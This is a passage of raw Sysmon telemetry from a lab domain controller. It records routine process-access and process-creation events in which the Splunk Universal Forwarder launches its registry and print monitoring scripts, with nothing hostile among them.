Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.478{D28789B6-7CE2-5FA1-4C01-000000008801}2836C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4B01-000000008801}2744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4B01-000000008801}2744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.367{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-4B01-000000008801}2744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.368{D28789B6-7CE2-5FA1-4B01-000000008801}2744C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4A01-000000008801}4652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4A01-000000008801}4652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.257{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-4A01-000000008801}4652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.258{D28789B6-7CE2-5FA1-4A01-000000008801}4652C:\Windows\System32\cmd.exe10.0.14393.0 